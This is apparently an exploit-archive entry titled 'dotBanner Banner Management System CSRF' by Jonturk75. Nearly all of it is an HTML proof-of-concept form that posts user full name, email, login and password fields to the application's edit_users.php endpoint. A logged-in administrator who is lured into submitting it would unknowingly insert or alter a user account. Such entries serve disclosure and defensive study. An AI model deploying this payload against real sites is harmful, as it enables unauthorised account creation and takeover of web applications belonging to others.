# Exploit Title: dotBanner Banner Management System CSRF # Author: Jonturk75 # Vendor or Software Link: http://www.scripts.com/viewscript/dotbanner-banner-management-system/6564/ # Category:: webapps <form method="post" action="edit_users.php?ccsForm=users" name="users" id="users"> <input name="hidden" value="" size="32" id="usersUsers_FullName"/> <input name="hidden" value="" size="30" maxlength="128" id="usersUsers_EmailAddress"/> <input name="hidden" value="" size="16" maxlength="16" id="usersUsers_Login"/> <input type="hidden" name="Users_Password" value="" size="16" maxlength="16" id="usersUsers_Password"/> <input type="image" name="Button_Insert" value="Insert" src="/img/uploadimg/20120312/1052330.gif" alt="Insert" style="border-width: 0px;" id="usersButton_Insert"/> </form>